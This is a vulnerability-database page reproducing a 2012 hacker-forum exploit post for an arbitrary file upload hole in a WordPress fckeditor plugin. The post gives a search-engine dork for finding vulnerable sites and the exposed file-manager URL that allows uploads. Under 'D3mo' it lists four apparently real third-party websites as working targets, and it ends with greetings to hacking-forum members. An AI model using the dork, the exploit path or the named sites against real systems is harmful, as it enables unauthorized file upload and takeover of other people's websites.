Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28471
HistorySep 02, 2012 - 12:00 a.m.

Wordpress fckeditor Arbitrary File Upload Vulnerability

2012-09-0200:00:00
vulners.com
60
JSON

a bug in Wordpress fckeditor that allows to us to occur a File Upload Vulnerability on a Remote machin.

########################################################################################

Exploit Title : Wordpress fckeditor Arbitrary File Upload Vulnerability

Author : IrIsT.Ir

Discovered By : Am!r

Home : http://IrIsT.Ir/forum

Software Link : http://wordpress.org

Security Risk : High

Version : All Version

Tested on : GNU/Linux Ubuntu - Windows Server - win7

Dork : intext:"Powered By Wordpress" + inurl:"wp-content/plugins/fckeditor"

########################################################################################

Expl0iTs :

http://target.com/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html

D3mo :

rentanice.com/booking/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html

sainttimothy.org/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html

lifesaving.ca/blog/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html

knike.fmf-radio.com/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html

########################################################################################

Greats : B3HZ4D - Crim3R - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r

0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r

Mr.Xpr & All Members In Www.IrIsT.Ir/forum

########################################################################################

JSON